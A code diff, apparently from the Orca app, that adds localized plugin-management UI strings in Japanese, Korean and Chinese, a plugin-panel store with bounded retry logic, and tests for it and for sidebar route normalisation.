+          "gitUrlInvalid": "HTTPS または SSH の Git URL を使用してください。実行可能な Git ヘルパープロトコルは使用できません。"
+        },
+        "PluginRemoveDialog": {
+          "title": "プラグインを削除しますか？",
+          "description": "{{value0}} と、このコンピューターに保存されたプラグインデータを削除します。後で再インストールできます。",
+          "cancel": "キャンセル",
+          "remove": "プラグインを削除"
+        },
+        "PluginSettingsRow": {
+          "needsReview": "確認が必要",
+          "invalid": "無効",
+          "error": "エラー",
+          "disabled": "無効",
+          "running": "実行中",
+          "enabled": "有効",
+          "workerTier": "バックグラウンドワーカー",
+          "panelTier": "パネルのみ",
+          "loadingLogs": "ログを読み込み中…",
+          "noLogs": "記録されたログ行はありません。",
+          "logCount": "保持されている最大 200 行のうち最新 {{value0}} 行",
+          "dev": "開発",
+          "review": "権限を確認",
+          "moreActions": "{{value0}} のその他の操作",
+          "hideLogs": "ログを非表示",
+          "viewLogs": "ログを表示",
+          "remove": "削除",
+          "enableLabel": "{{value0}} を有効化",
+          "restartCount": " · {{value0}} 回再起動",
+          "restarting": "再起動中"
+        },
+        "PluginsSettingsSection": {
+          "loadFailed": "プラグインを読み込めませんでした。",
+          "logsFailed": "プラグインのログを読み込めませんでした。",
+          "title": "プラグイン",
+          "experimental": "試験的",
+          "description": "Orca プラグインをインストールして管理します。SSH ワークスペースの場合も、プラグインはこのコンピューターで実行されます。",
+          "install": "プラグインをインストール",
+          "systemLabel": "プラグインシステム",
+          "systemDescription": "インストール済みプラグインを検出し、個別に有効化できます。確認して有効にするまでは何も実行されません。ワーカーは常にこのコンピューターで実行され、SSH ワークスペースの操作は Orca 経由で処理されます。",
+          "featureOff": "インストール済みプラグインを表示・管理するには、プラグインシステムを有効にしてください。すでにインストールされているものはディスクに残り、システムがオフの間は無効のままです。",
+          "loading": "プラグインを読み込み中…",
+          "installed": "インストール済み",
+          "refresh": "更新",
+          "tryAgain": "再試行",
+          "empty": "プラグインはインストールされていません。「プラグインをインストール」から、ローカルフォルダーまたは固定された Git ref を追加してください。",
+          "settingsUpdateFailed": "プラグイン設定を保存できませんでした。"
+        },
+        "plugins": {
+          "search": {
+            "title": "プラグイン",
+            "description": "試験的な Orca プラグインをインストールして管理します。",
+            "install": "プラグインをインストール",
+            "permissions": "プラグインの権限",
+            "logs": "プラグインのログ",
+            "development": "開発用プラグイン"
+          }
         }
       },
       "right": {
@@ -10139,6 +10253,12 @@
             "workspaceGone": "Couldn't open log — workspace is no longer available.",
             "notAuthorized": "Couldn't open log — path not authorized.",
             "alreadyEditable": "Log is already open for editing."
+          },
+          "PluginPanel": {
+            "loading": "プラグインパネルを読み込み中...",
+            "unavailable": "このプラグインパネルは利用できなくなりました。",
+            "loadFailed": "プラグインパネルを読み込めませんでした。",
+            "unresponsive": "プラグインパネルが応答しなくなったため停止しました。"
           }
         }
       },
@@ -12687,6 +12807,11 @@
             "noPr": "PR なし",
             "unavailable": "利用不可"
           }
+        },
+        "pluginPanelBridgeHost": {
+          "actionsUnavailable": "このクライアントではプラグイン操作を利用できません。",
+          "messageTooLarge": "メッセージがサイズ制限を超えています。",
+          "tooManyRequests": "リクエストが多すぎます。"
         }
       },
       "link": {
@@ -12991,7 +13116,7 @@
         "pastedImageLabel": "貼り付けた画像",
         "imagePasteFailed": "画像の貼り付けに失敗しました。",
         "worktreeNotReady": "Worktreeが準備できていません — しばらくしてから再試行してください。",
-        "uploadingAttachments": "{{value0}}個のファイルをリモートにアップロード中…"
+        "uploadingAttachments": "Uploading {{value0}} file(s) to remote…"
       },
       "tool": {
         "running": "実行中…",

--- a/src/renderer/src/i18n/locales/ko.json
+++ b/src/renderer/src/i18n/locales/ko.json
@@ -698,7 +698,9 @@
         "devSearchKeywordToast": "toast",
         "devSearchKeywordSonner": "sonner",
         "devSearchKeywordError": "error",
-        "devSearchKeywordNotification": "notification"
+        "devSearchKeywordNotification": "notification",
+        "pluginsTitle": "플러그인",
+        "pluginsDescription": "실험적인 Orca 플러그인을 설치하고 관리합니다."
       },
       "useAppMenuPaste": {
         "pasteTooLarge": "붙여넣기 내용이 너무 큽니다."
@@ -9032,6 +9034,118 @@
         "TerminalInteractionSection": {
           "567633ff50": "Right-click pastes the clipboard into the terminal. Control-click to open the context menu.",
           "c64497148a": "Right-click pastes the clipboard. Control-click opens the context menu."
+        },
+        "PluginConsentDialog": {
+          "workerTrust": "백그라운드 워커 — 별도 프로세스에서 실행",
+          "panelTrust": "패널 전용 — 워커 프로세스 없음",
+          "decisionFailed": "권한 결정을 저장할 수 없습니다.",
+          "title": "권한 검토",
+          "subtitle": "{{value0}} v{{value1}} · {{value2}}",
+          "reconsent": "이 플러그인을 마지막으로 검토한 후 권한 또는 워커 신뢰 수준이 변경되었습니다. 실행하기 전에 다시 검토하세요.",
+          "source": "소스",
+          "unknownSource": "사용할 수 없음",
+          "commit": "커밋",
+          "localCommit": "사용할 수 없음(로컬 폴더)",
+          "trust": "신뢰 수준",
+          "capabilities": "이 플러그인이 할 수 있는 작업",
+          "warning": "이 권한은 플러그인이 Orca API를 사용하는 방식을 제한합니다. 워커는 컴퓨터에서 일반 프로세스로 실행되므로 파일, 네트워크 및 다른 프로세스에 모두 접근할 수 있습니다.",
+          "enable": "플러그인 활성화",
+          "keepDisabled": "비활성화 유지",
+          "panelWarning": "이 권한은 플러그인이 Orca API를 사용하는 방식을 제한합니다. 이 플러그인에는 워커 프로세스가 없습니다.",
+          "capability": {
+            "workspaceRead": "선택한 워크트리의 이름, 브랜치 및 터미널 목록 읽기",
+            "terminalSend": "표시된 특정 터미널에 텍스트 입력",
+            "notificationsShow": "플러그인 이름이 표시된 데스크톱 알림 보기",
+            "storage": "플러그인 전용 저장소 폴더에 데이터 저장",
+            "secrets": "플러그인 전용 암호화 보관소에서 비밀 정보 저장 및 읽기",
+            "eventsSubscribe": "워크트리가 생성 또는 제거되거나 에이전트 상태가 변경될 때 알림 받기",
+            "settingsOwn": "플러그인 자체 설정 읽기 및 변경"
+          }
+        },
+        "PluginDevelopmentSection": {
+          "pathRequired": "플러그인 폴더 경로를 입력하세요.",
+          "title": "개발",
+          "help": "개발하는 동안 이 컴퓨터의 폴더에서 플러그인을 직접 불러옵니다. 개발용 플러그인도 권한 검토가 필요합니다. 워커는 이 데스크톱 호스트에서 실행되고 SSH 워크스페이스 작업은 Orca를 통해 라우팅되므로 여기에 데스크톱 경로를 입력하세요.",
+          "remove": "제거",
+          "placeholder": "/Users/you/plugins/my-plugin or C:\\Users\\you\\plugins\\my-plugin",
+          "add": "경로 추가",
+          "saveFailed": "개발용 플러그인 경로를 저장할 수 없습니다."
+        },
+        "PluginInstallDialog": {
+          "localRequired": "플러그인 폴더 경로를 입력하세요.",
+          "gitUrlRequired": "저장소 URL을 입력하세요.",
+          "gitRefRequired": "설치를 고정하려면 명시적인 #ref(태그 또는 커밋)를 추가하세요. 예: #v0.1.0.",
+          "installFailed": "플러그인 설치에 실패했습니다.",
+          "title": "플러그인 설치",
+          "description": "설치하면 플러그인이 Orca에 복사되고 검토할 권한이 표시됩니다. 활성화하기 전에는 플러그인 코드가 실행되지 않습니다.",
+          "source": "설치 소스",
+          "localTab": "로컬 폴더",
+          "gitTab": "Git URL",
+          "localLabel": "플러그인 폴더 경로",
+          "localPlaceholder": "/Users/you/plugins/my-plugin or C:\\Users\\you\\plugins\\my-plugin",
+          "localHelp": "이 컴퓨터에서 orca-plugin.json이 들어 있는 폴더의 전체 경로입니다. 입력한 경로를 그대로 사용합니다.",
+          "gitLabel": "#ref가 포함된 저장소 URL",
+          "gitPlaceholder": "https://git.example/acme/orca-notes#v0.1.0",
+          "gitHelp": "명시적인 #ref(태그 또는 커밋)를 추가해 설치를 고정하세요. GitHub, GitLab 및 모든 Git 호스트에서 사용할 수 있습니다.",
+          "cancel": "취소",
+          "installing": "설치 중…",
+          "install": "설치",
+          "gitUrlInvalid": "HTTPS 또는 SSH Git URL을 사용하세요. 실행 가능한 Git 도우미 프로토콜은 허용되지 않습니다."
+        },
+        "PluginRemoveDialog": {
+          "title": "플러그인을 제거하시겠습니까?",
+          "description": "{{value0}} 및 이 컴퓨터에 저장된 플러그인 데이터를 제거합니다. 나중에 다시 설치할 수 있습니다.",
+          "cancel": "취소",
+          "remove": "플러그인 제거"
+        },
+        "PluginSettingsRow": {
+          "needsReview": "검토 필요",
+          "invalid": "유효하지 않음",
+          "error": "오류",
+          "disabled": "비활성화됨",
+          "running": "실행 중",
+          "enabled": "활성화됨",
+          "workerTier": "백그라운드 워커",
+          "panelTier": "패널 전용",
+          "loadingLogs": "로그 불러오는 중…",
+          "noLogs": "기록된 로그 줄이 없습니다.",
+          "logCount": "보관된 최대 200줄 중 최근 {{value0}}줄",
+          "dev": "개발",
+          "review": "권한 검토",
+          "moreActions": "{{value0}}의 추가 작업",
+          "hideLogs": "로그 숨기기",
+          "viewLogs": "로그 보기",
+          "remove": "제거",
+          "enableLabel": "{{value0}} 활성화",
+          "restartCount": " · {{value0}}회 다시 시작",
+          "restarting": "다시 시작 중"
+        },
+        "PluginsSettingsSection": {
+          "loadFailed": "플러그인을 불러올 수 없습니다.",
+          "logsFailed": "플러그인 로그를 불러올 수 없습니다.",
+          "title": "플러그인",
+          "experimental": "실험적",
+          "description": "Orca 플러그인을 설치하고 관리합니다. SSH 워크스페이스에서도 플러그인은 이 컴퓨터에서 실행됩니다.",
+          "install": "플러그인 설치",
+          "systemLabel": "플러그인 시스템",
+          "systemDescription": "설치된 플러그인을 찾아 개별적으로 활성화할 수 있습니다. 검토하고 활성화하기 전에는 아무것도 실행되지 않습니다. 워커는 항상 이 컴퓨터에서 실행되고 SSH 워크스페이스 작업은 Orca를 통해 라우팅됩니다.",
+          "featureOff": "플러그인 시스템을 켜서 설치된 플러그인을 보고 관리하세요. 이미 설치된 항목은 디스크에 남으며 시스템이 꺼져 있는 동안 비활성화 상태를 유지합니다.",
+          "loading": "플러그인 불러오는 중…",
+          "installed": "설치됨",
+          "refresh": "새로 고침",
+          "tryAgain": "다시 시도",
+          "empty": "설치된 플러그인이 없습니다. 플러그인 설치를 사용해 로컬 폴더 또는 고정된 Git ref에서 추가하세요.",
+          "settingsUpdateFailed": "플러그인 설정을 저장할 수 없습니다."
+        },
+        "plugins": {
+          "search": {
+            "title": "플러그인",
+            "description": "실험적인 Orca 플러그인을 설치하고 관리합니다.",
+            "install": "플러그인 설치",
+            "permissions": "플러그인 권한",
+            "logs": "플러그인 로그",
+            "development": "개발용 플러그인"
+          }
         }
       },
       "right": {
@@ -10139,6 +10253,12 @@
             "workspaceGone": "Couldn't open log — workspace is no longer available.",
             "notAuthorized": "Couldn't open log — path not authorized.",
             "alreadyEditable": "Log is already open for editing."
+          },
+          "PluginPanel": {
+            "loading": "플러그인 패널 불러오는 중...",
+            "unavailable": "이 플러그인 패널은 더 이상 사용할 수 없습니다.",
+            "loadFailed": "플러그인 패널을 불러올 수 없습니다.",
+            "unresponsive": "플러그인 패널이 응답하지 않아 일시 중단되었습니다."
           }
         }
       },
@@ -12687,6 +12807,11 @@
             "noPr": "PR 없음",
             "unavailable": "사용 불가"
           }
+        },
+        "pluginPanelBridgeHost": {
+          "actionsUnavailable": "이 클라이언트에서는 플러그인 작업을 사용할 수 없습니다.",
+          "messageTooLarge": "메시지가 크기 제한을 초과합니다.",
+          "tooManyRequests": "요청이 너무 많습니다."
         }
       },
       "link": {
@@ -12991,7 +13116,7 @@
         "pastedImageLabel": "붙여넣은 이미지",
         "imagePasteFailed": "이미지 붙여넣기 실패.",
         "worktreeNotReady": "워크트리가 준비되지 않았습니다 — 잠시 후 다시 시도하세요.",
-        "uploadingAttachments": "{{value0}}개 파일을 원격으로 업로드 중…"
+        "uploadingAttachments": "Uploading {{value0}} file(s) to remote…"
       },
       "tool": {
         "running": "실행 중…",

--- a/src/renderer/src/i18n/locales/zh.json
+++ b/src/renderer/src/i18n/locales/zh.json
@@ -698,7 +698,9 @@
         "devSearchKeywordToast": "toast",
         "devSearchKeywordSonner": "sonner",
         "devSearchKeywordError": "error",
-        "devSearchKeywordNotification": "notification"
+        "devSearchKeywordNotification": "notification",
+        "pluginsTitle": "插件",
+        "pluginsDescription": "安装和管理实验性 Orca 插件。"
       },
       "useAppMenuPaste": {
         "pasteTooLarge": "粘贴内容过大。"
@@ -9032,6 +9034,118 @@
         "TerminalInteractionSection": {
           "567633ff50": "Right-click pastes the clipboard into the terminal. Control-click to open the context menu.",
           "c64497148a": "Right-click pastes the clipboard. Control-click opens the context menu."
+        },
+        "PluginConsentDialog": {
+          "workerTrust": "后台工作进程 — 在独立进程中运行",
+          "panelTrust": "仅面板 — 无工作进程",
+          "decisionFailed": "无法保存权限决定。",
+          "title": "检查权限",
+          "subtitle": "{{value0}} v{{value1}} · {{value2}}",
+          "reconsent": "自你上次检查此插件以来，权限或工作进程信任级别已更改。请在运行前重新检查。",
+          "source": "来源",
+          "unknownSource": "不可用",
+          "commit": "提交",
+          "localCommit": "不可用（本地文件夹）",
+          "trust": "信任级别",
+          "capabilities": "此插件可以",
+          "warning": "这些权限限制插件使用 Orca API 的方式。其工作进程仍作为普通进程在你的计算机上运行，可以完全访问文件、网络和其他进程。",
+          "enable": "启用插件",
+          "keepDisabled": "保持禁用",
+          "panelWarning": "这些权限限制插件使用 Orca API 的方式。此插件没有工作进程。",
+          "capability": {
+            "workspaceRead": "读取当前工作树的名称、分支和终端列表",
+            "terminalSend": "在可见的指定终端中输入文本",
+            "notificationsShow": "显示带有插件名称的桌面通知",
+            "storage": "在插件自己的存储文件夹中保存数据",
+            "secrets": "在插件自己的加密保管库中保存和读取机密信息",
+            "eventsSubscribe": "在创建或移除工作树以及智能体状态变化时接收通知",
+            "settingsOwn": "读取和更改插件自己的设置"
+          }
+        },
+        "PluginDevelopmentSection": {
+          "pathRequired": "请输入插件文件夹路径。",
+          "title": "开发",
+          "help": "开发插件时，可直接从此计算机上的文件夹加载。开发插件仍需检查权限。工作进程在此桌面主机上运行；SSH 工作区操作通过 Orca 路由，因此这里填写桌面端路径。",
+          "remove": "移除",
+          "placeholder": "/Users/you/plugins/my-plugin or C:\\Users\\you\\plugins\\my-plugin",
+          "add": "添加路径",
+          "saveFailed": "无法保存开发插件路径。"
+        },
+        "PluginInstallDialog": {
+          "localRequired": "请输入插件文件夹路径。",
+          "gitUrlRequired": "请输入仓库 URL。",
+          "gitRefRequired": "请添加明确的 #ref（标签或提交）以固定安装版本，例如 #v0.1.0。",
+          "installFailed": "插件安装失败。",
+          "title": "安装插件",
+          "description": "安装会将插件复制到 Orca，并显示其权限供你检查。启用插件之前，不会运行任何插件代码。",
+          "source": "安装来源",
+          "localTab": "本地文件夹",
+          "gitTab": "Git URL",
+          "localLabel": "插件文件夹路径",
+          "localPlaceholder": "/Users/you/plugins/my-plugin or C:\\Users\\you\\plugins\\my-plugin",
+          "localHelp": "此计算机上包含 orca-plugin.json 的文件夹完整路径。系统会完全按输入内容使用该路径。",
+          "gitLabel": "带 #ref 的仓库 URL",
+          "gitPlaceholder": "https://git.example/acme/orca-notes#v0.1.0",
+          "gitHelp": "附加明确的 #ref（标签或提交）以固定安装版本。适用于 GitHub、GitLab 和任何 Git 主机。",
+          "cancel": "取消",
+          "installing": "正在安装…",
+          "install": "安装",
+          "gitUrlInvalid": "请使用 HTTPS 或 SSH Git URL。不允许使用可执行的 Git 辅助协议。"
+        },
+        "PluginRemoveDialog": {
+          "title": "移除插件？",
+          "description": "这会从此计算机中移除 {{value0}} 及其保存的插件数据。你可以稍后重新安装。",
+          "cancel": "取消",
+          "remove": "移除插件"
+        },
+        "PluginSettingsRow": {
+          "needsReview": "需要检查",
+          "invalid": "无效",
+          "error": "错误",
+          "disabled": "已禁用",
+          "running": "正在运行",
+          "enabled": "已启用",
+          "workerTier": "后台工作进程",
+          "panelTier": "仅面板",
+          "loadingLogs": "正在加载日志…",
+          "noLogs": "没有记录日志行。",
+          "logCount": "最多保留 200 行，显示最近 {{value0}} 行",
+          "dev": "开发",
+          "review": "检查权限",
+          "moreActions": "{{value0}} 的更多操作",
+          "hideLogs": "隐藏日志",
+          "viewLogs": "查看日志",
+          "remove": "移除",
+          "enableLabel": "启用 {{value0}}",
+          "restartCount": " · 重启 {{value0}} 次",
+          "restarting": "正在重新启动"
+        },
+        "PluginsSettingsSection": {
+          "loadFailed": "无法加载插件。",
+          "logsFailed": "无法加载插件日志。",
+          "title": "插件",
+          "experimental": "实验性",
+          "description": "安装和管理 Orca 插件。即使使用 SSH 工作区，插件也在此计算机上运行。",
+          "install": "安装插件",
+          "systemLabel": "插件系统",
+          "systemDescription": "发现已安装的插件，并允许逐个启用。检查并启用之前不会运行任何内容。工作进程始终在此计算机上运行；SSH 工作区操作通过 Orca 路由。",
+          "featureOff": "开启插件系统以查看和管理已安装的插件。已安装的内容会保留在磁盘上，并在系统关闭时保持禁用。",
+          "loading": "正在加载插件…",
+          "installed": "已安装",
+          "refresh": "刷新",
+          "tryAgain": "重试",
+          "empty": "尚未安装插件。使用“安装插件”从本地文件夹或固定的 Git ref 添加插件。",
+          "settingsUpdateFailed": "无法保存插件设置。"
+        },
+        "plugins": {
+          "search": {
+            "title": "插件",
+            "description": "安装和管理实验性 Orca 插件。",
+            "install": "安装插件",
+            "permissions": "插件权限",
+            "logs": "插件日志",
+            "development": "开发插件"
+          }
         }
       },
       "right": {
@@ -10139,6 +10253,12 @@
             "workspaceGone": "Couldn't open log — workspace is no longer available.",
             "notAuthorized": "Couldn't open log — path not authorized.",
             "alreadyEditable": "Log is already open for editing."
+          },
+          "PluginPanel": {
+            "loading": "正在加载插件面板...",
+            "unavailable": "此插件面板已不可用。",
+            "loadFailed": "无法加载插件面板。",
+            "unresponsive": "插件面板停止响应，已被暂停。"
           }
         }
       },
@@ -12687,6 +12807,11 @@
             "noPr": "无 PR",
             "unavailable": "不可用"
           }
+        },
+        "pluginPanelBridgeHost": {
+          "actionsUnavailable": "此客户端不支持插件操作。",
+          "messageTooLarge": "消息超过大小限制。",
+          "tooManyRequests": "请求过多。"
         }
       },
       "link": {
@@ -12991,7 +13116,7 @@
         "pastedImageLabel": "粘贴的图片",
         "imagePasteFailed": "图片粘贴失败。",
         "worktreeNotReady": "Worktree 未就绪 — 请稍后重试。",
-        "uploadingAttachments": "正在上传 {{value0}} 个文件到远程…"
+        "uploadingAttachments": "Uploading {{value0}} file(s) to remote…"
       },
       "tool": {
         "running": "正在运行…",

--- a/src/renderer/src/store/plugin-panels.test.ts
+++ b/src/renderer/src/store/plugin-panels.test.ts
@@ -1,0 +1,117 @@
+// @vitest-environment happy-dom
+
+import { afterEach, describe, expect, it, vi } from 'vitest'
+import type { PluginHostListEntry } from '../../../preload/api-types'
+import { usePluginPanelsStore } from './plugin-panels'
+
+function plugin(pluginKey: string): PluginHostListEntry {
+  return {
+    pluginKey,
+    consentFingerprint: 'sha256-test',
+    name: pluginKey,
+    version: '1.0.0',
+    publisher: 'orca-samples',
+    status: 'idle',
+    needsReconsent: false,
+    isDev: false,
+    capabilities: [],
+    panels: [],
+    commands: [],
+    hasWorker: false,
+    restarts: 0
+  }
+}
+
+afterEach(() => {
+  usePluginPanelsStore.getState().setPlugins([])
+  usePluginPanelsStore.setState({ plugins: [], panelErrors: {}, fetchStatus: 'idle' })
+  vi.useRealTimers()
+  vi.unstubAllGlobals()
+})
+
+describe('plugin panel list loading', () => {
+  it('bounds watchdog errors to installed panels and clears them on recovery', () => {
+    const installed = {
+      ...plugin('orca-samples.current'),
+      panels: [
+        {
+          id: 'dashboard',
+          title: 'Dashboard',
+          tabKey: 'plugin:orca-samples.current/dashboard' as const
+        }
+      ]
+    }
+    usePluginPanelsStore.getState().setPlugins([installed])
+    usePluginPanelsStore.getState().setPanelHealth('plugin:orca-samples.current/dashboard', 'error')
+    expect(usePluginPanelsStore.getState().panelErrors).toEqual({
+      'plugin:orca-samples.current/dashboard': true
+    })
+
+    usePluginPanelsStore
+      .getState()
+      .setPanelHealth('plugin:orca-samples.current/dashboard', 'healthy')
+    expect(usePluginPanelsStore.getState().panelErrors).toEqual({})
+
+    usePluginPanelsStore.getState().setPanelHealth('plugin:orca-samples.current/dashboard', 'error')
+    usePluginPanelsStore.getState().setPlugins([])
+    expect(usePluginPanelsStore.getState().panelErrors).toEqual({})
+  })
+
+  it('does not let an older request overwrite a newer plugin list', async () => {
+    let resolveFirst!: (plugins: PluginHostListEntry[]) => void
+    let resolveSecond!: (plugins: PluginHostListEntry[]) => void
+    const list = vi
+      .fn()
+      .mockImplementationOnce(() => new Promise((resolve) => (resolveFirst = resolve)))
+      .mockImplementationOnce(() => new Promise((resolve) => (resolveSecond = resolve)))
+    vi.stubGlobal('window', { api: { plugins: { list } } })
+
+    const first = usePluginPanelsStore.getState().fetchPlugins()
+    const second = usePluginPanelsStore.getState().fetchPlugins()
+    resolveSecond([plugin('orca-samples.current')])
+    await second
+    resolveFirst([plugin('orca-samples.stale')])
+    await first
+
+    expect(usePluginPanelsStore.getState().plugins.map((entry) => entry.pluginKey)).toEqual([
+      'orca-samples.current'
+    ])
+  })
+
+  it('clears stale executable panels when the current list refresh fails', async () => {
+    usePluginPanelsStore.setState({
+      plugins: [plugin('orca-samples.stale')],
+      fetchStatus: 'ready'
+    })
+    vi.stubGlobal('window', {
+      api: { plugins: { list: vi.fn().mockRejectedValue(new Error('transport failed')) } }
+    })
+
+    await usePluginPanelsStore.getState().fetchPlugins()
+
+    expect(usePluginPanelsStore.getState()).toMatchObject({
+      plugins: [],
+      fetchStatus: 'error'
+    })
+  })
+
+  it('recovers automatically from a transient list failure with bounded backoff', async () => {
+    vi.useFakeTimers()
+    const list = vi
+      .fn()
+      .mockRejectedValueOnce(new Error('transport starting'))
+      .mockResolvedValueOnce([plugin('orca-samples.recovered')])
+    vi.stubGlobal('window', { api: { plugins: { list } } })
+
+    await usePluginPanelsStore.getState().fetchPlugins()
+    expect(usePluginPanelsStore.getState().fetchStatus).toBe('error')
+
+    await vi.advanceTimersByTimeAsync(250)
+
+    expect(list).toHaveBeenCalledTimes(2)
+    expect(usePluginPanelsStore.getState()).toMatchObject({
+      fetchStatus: 'ready',
+      plugins: [expect.objectContaining({ pluginKey: 'orca-samples.recovered' })]
+    })
+  })
+})

--- a/src/renderer/src/store/plugin-panels.ts
+++ b/src/renderer/src/store/plugin-panels.ts
@@ -1,0 +1,169 @@
+import { useEffect, useMemo } from 'react'
+import { create } from 'zustand'
+import type { PluginHostListEntry, PluginHostPanel } from '../../../preload/api-types'
+
+/** A panel contribution from an enabled plugin, flattened for sidebar use. */
+export type ActivePluginPanel = PluginHostPanel & {
+  pluginKey: string
+  pluginName: string
+}
+
+export type PluginPanelsFetchStatus = 'idle' | 'loading' | 'ready' | 'error'
+export type PluginPanelHealth = 'healthy' | 'error'
+
+type PluginPanelsState = {
+  plugins: PluginHostListEntry[]
+  panelErrors: Record<string, true>
+  fetchStatus: PluginPanelsFetchStatus
+  fetchPlugins: () => Promise<void>
+  setPlugins: (plugins: PluginHostListEntry[]) => void
+  setPanelHealth: (tabKey: string, health: PluginPanelHealth) => void
+}
+
+let pluginListGeneration = 0
+let pluginListRetryAttempt = 0
+let pluginListRetryTimer: ReturnType<typeof setTimeout> | null = null
+const PLUGIN_LIST_MAX_RETRIES = 2
+
+function schedulePluginListRetry(generation: number): void {
+  if (pluginListRetryAttempt >= PLUGIN_LIST_MAX_RETRIES) {
+    pluginListRetryAttempt = 0
+    return
+  }
+  pluginListRetryAttempt += 1
+  const delayMs = 250 * 2 ** (pluginListRetryAttempt - 1)
+  pluginListRetryTimer = setTimeout(() => {
+    pluginListRetryTimer = null
+    const state = usePluginPanelsStore.getState()
+    if (generation === pluginListGeneration && state.fetchStatus === 'error') {
+      void state.fetchPlugins()
+    }
+  }, delayMs)
+}
+
+export const usePluginPanelsStore = create<PluginPanelsState>()((set) => ({
+  plugins: [],
+  panelErrors: {},
+  fetchStatus: 'idle',
+  fetchPlugins: async () => {
+    const generation = ++pluginListGeneration
+    // Why: preload may predate the plugins namespace (web client pairing an
+    // older desktop build); treat a missing bridge as "no plugins" fail-soft.
+    const pluginsApi = window.api?.plugins
+    if (!pluginsApi) {
+      if (generation === pluginListGeneration) {
+        pluginListRetryAttempt = 0
+        set({ fetchStatus: 'ready', plugins: [], panelErrors: {} })
+      }
+      return
+    }
+    set({ fetchStatus: 'loading' })
+    try {
+      const plugins = await pluginsApi.list()
+      if (generation === pluginListGeneration) {
+        pluginListRetryAttempt = 0
+        set((state) => ({
+          plugins,
+          fetchStatus: 'ready',
+          panelErrors: retainInstalledPanelErrors(state.panelErrors, plugins)
+        }))
+      }
+    } catch {
+      if (generation === pluginListGeneration) {
+        // A failed authority refresh must not leave previously enabled panel
+        // documents mounted from stale state. Bounded retries recover from a
+        // transient preload/main startup race without spinning indefinitely.
+        set({ plugins: [], panelErrors: {}, fetchStatus: 'error' })
+        schedulePluginListRetry(generation)
+      }
+    }
+  },
+  setPlugins: (plugins) => {
+    pluginListGeneration += 1
+    pluginListRetryAttempt = 0
+    if (pluginListRetryTimer) {
+      clearTimeout(pluginListRetryTimer)
+      pluginListRetryTimer = null
+    }
+    set((state) => ({
+      plugins,
+      fetchStatus: 'ready',
+      panelErrors: retainInstalledPanelErrors(state.panelErrors, plugins)
+    }))
+  },
+  setPanelHealth: (tabKey, health) => {
+    set((state) => {
+      const panelErrors = { ...state.panelErrors }
+      if (health === 'error') {
+        panelErrors[tabKey] = true
+      } else {
+        delete panelErrors[tabKey]
+      }
+      return { panelErrors }
+    })
+  }
+}))
+
+function retainInstalledPanelErrors(
+  panelErrors: Readonly<Record<string, true>>,
+  plugins: readonly PluginHostListEntry[]
+): Record<string, true> {
+  const installed = collectInstalledPluginTabKeys(plugins)
+  return Object.fromEntries(
+    Object.entries(panelErrors).filter(([tabKey]) => installed.has(tabKey))
+  ) as Record<string, true>
+}
+
+let changeSubscriptionStarted = false
+
+/** Kicks off the startup fetch and subscribes to main-process change pushes
+ *  (install/remove/enable/dev-reload); safe to call repeatedly. */
+export function ensurePluginPanelsLoaded(): void {
+  const { fetchStatus, fetchPlugins } = usePluginPanelsStore.getState()
+  if (fetchStatus === 'idle') {
+    void fetchPlugins()
+  }
+  if (!changeSubscriptionStarted && window.api?.plugins?.onChanged) {
+    changeSubscriptionStarted = true
+    window.api.plugins.onChanged(() => {
+      void usePluginPanelsStore.getState().fetchPlugins()
+    })
+  }
+}
+
+/** Panels of plugins the user enabled (consented + not disabled). `idle` and
+ *  `restarting` still show panels — the panel itself never needs a worker. */
+export function collectActivePluginPanels(plugins: PluginHostListEntry[]): ActivePluginPanel[] {
+  return plugins
+    .filter(
+      (plugin) =>
+        plugin.status === 'running' || plugin.status === 'restarting' || plugin.status === 'idle'
+    )
+    .flatMap((plugin) =>
+      plugin.panels.map((panel) => ({
+        ...panel,
+        pluginKey: plugin.pluginKey,
+        pluginName: plugin.name
+      }))
+    )
+}
+
+/** Tab keys of every installed plugin panel (any status) — used by the
+ *  persisted-route normalizer to drop keys of uninstalled plugins while
+ *  keeping keys that are merely disabled. */
+export function collectInstalledPluginTabKeys(
+  plugins: readonly PluginHostListEntry[]
+): Set<string> {
+  return new Set(plugins.flatMap((plugin) => plugin.panels.map((panel) => panel.tabKey)))
+}
+
+/** Panel contributions of enabled plugins, loading the list on first use. */
+export function usePluginPanels(): ActivePluginPanel[] {
+  const plugins = usePluginPanelsStore((s) => s.plugins)
+  useEffect(() => {
+    ensurePluginPanelsLoaded()
+  }, [])
+  // Why: derive in useMemo (not the selector) so the store snapshot stays
+  // referentially stable and doesn't retrigger useSyncExternalStore loops.
+  return useMemo(() => collectActivePluginPanels(plugins), [plugins])
+}

--- a/src/renderer/src/store/right-sidebar-route.test.ts
+++ b/src/renderer/src/store/right-sidebar-route.test.ts
@@ -15,4 +15,37 @@ describe('normalizeRightSidebarRoute', () => {
       rightSidebarExplorerView: 'files'
     })
   })
+
+  it('preserves well-formed plugin panel tabs', () => {
+    expect(normalizeRightSidebarRoute('plugin:orca-samples.my-plugin/dashboard')).toEqual({
+      rightSidebarTab: 'plugin:orca-samples.my-plugin/dashboard',
+      rightSidebarExplorerView: 'files'
+    })
+  })
+
+  it('drops a well-formed tab once the installed plugin list proves it is stale', () => {
+    expect(
+      normalizeRightSidebarRoute('plugin:orca-samples.removed/dashboard', undefined, {
+        installedPluginTabKeys: new Set(['plugin:orca-samples.present/dashboard'])
+      })
+    ).toEqual({
+      rightSidebarTab: 'explorer',
+      rightSidebarExplorerView: 'files'
+    })
+  })
+
+  it('normalizes malformed plugin tabs to Explorer files', () => {
+    expect(normalizeRightSidebarRoute('plugin:orca-samples.my-plugin')).toEqual({
+      rightSidebarTab: 'explorer',
+      rightSidebarExplorerView: 'files'
+    })
+    expect(normalizeRightSidebarRoute('plugin:orca-samples.my-plugin/panel/extra')).toEqual({
+      rightSidebarTab: 'explorer',
+      rightSidebarExplorerView: 'files'
+    })
+    expect(normalizeRightSidebarRoute('plugin:My_Plugin/Panel!')).toEqual({
+      rightSidebarTab: 'explorer',
+      rightSidebarExplorerView: 'files'
+    })
+  })
 })

--- a/src/renderer/src/store/right-sidebar-route.ts
+++ b/src/renderer/src/store/right-sidebar-route.ts
@@ -1,4 +1,5 @@
 import type { ActiveRightSidebarTab, RightSidebarExplorerView } from '../../../shared/types'
+import { isPluginPanelTabKey } from '../../../shared/plugins/plugin-manifest'
 
 export type RightSidebarRoute = {
   rightSidebarTab: ActiveRightSidebarTab
@@ -9,13 +10,31 @@ function normalizeRightSidebarExplorerView(view: unknown): RightSidebarExplorerV
   return view === 'search' ? 'search' : 'files'
 }
 
+export type NormalizeRightSidebarRouteOptions = {
+  /** Tab keys of currently installed plugin panels. When provided, persisted
